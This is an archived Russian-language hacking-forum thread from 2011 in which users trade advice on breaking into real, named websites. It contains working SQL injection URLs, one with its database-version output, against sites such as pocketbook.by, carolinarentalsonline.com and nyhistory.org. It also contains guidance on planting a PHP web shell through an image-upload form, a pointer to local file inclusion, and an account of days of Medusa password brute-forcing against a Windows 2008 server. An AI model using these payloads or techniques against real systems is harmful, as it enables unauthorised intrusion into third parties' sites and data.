ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.03.2011, 01:43
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Либо искать локальный инклуд, либо найти папку с правами, доступную из-под веба.
|
|
|
13.03.2011, 01:57
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
Сообщение от mailbrush
mailbrush said:
Либо искать локальный инклуд, либо найти папку с правами, доступную из-под веба.
можно поподробней?
|
|
|
|
13.03.2011, 01:59
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
LFI (Local File Include) - это тип уязвимости. Подробнее в поиске.
Папка с правами - папка, в которую возможно записать что-либо, и которая доступна из-под веба.
|
|
|
|
13.03.2011, 14:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
8829
Репутация:
-3
|
|
Как здесь хоть что то вывести?
http://pocketbook.by/index.php?id=-200+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15--
|
|
|
|
13.03.2011, 14:45
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от asql
asql said:
Как здесь хоть что то вывести?
http://pocketbook.by/index.php?id=-200+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15--
http://pocketbook.by/index.php?id=200+and+(select+1+from+(select+count( 0),concat((select+version()),floor(rand(0)*2))+fro m+(select+1+union+select+2+union+select+3)x+group+ by+2+limit+1)a)+--+
Duplicate entry '5.0.51a-24+lenny4-log1' for key 1
|
|
|
|
13.03.2011, 18:37
|
|
Участник форума
Регистрация: 31.01.2010
Сообщений: 170
Провел на форуме:
1442841
Репутация:
63
|
|
Заливаю шелл через форму отправки изображений. При загрузке имя файла меняется на .jpg/.gif и т.д. Знаю папку куда все складывается,но прямого доступа к ней не имею. Шелл с расширением .php.jpg переименовывается в .jpg + замена имени. Как быть?
|
|
|
|
13.03.2011, 19:44
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от Compton
Compton said:
Заливаю шелл через форму отправки изображений. При загрузке имя файла меняется на .jpg/.gif и т.д. Знаю папку куда все складывается,но прямого доступа к ней не имею. Шелл с расширением .php.jpg переименовывается в .jpg + замена имени. Как быть?
https://rdot.org/forum/showpost.php?p=1142&postcount=6
|
|
|
|
13.03.2011, 20:39
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Какая здесь версия БД?
http://www.carolinarentalsonline.com/detail.asp?id=43
|
|
|
|
13.03.2011, 22:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
28895
Репутация:
4
|
|
Ребят задался вопросом. Есть ли по дефолту в вин2008, число неудачных попыток входов в систему, после чего лок? Просто 3-и сутки медузой перебираю безрезультатно (Хотя знаю, что в словаре точно есть правильный пасс)
|
|
|
|
13.03.2011, 22:50
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Здесь вывести через ошибку возможно?
https://www.nyhistory.org/web/default.php?section=public_programs&page=detail&pr ogram=1499350+%6f%72%64%65%72+by+1000+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
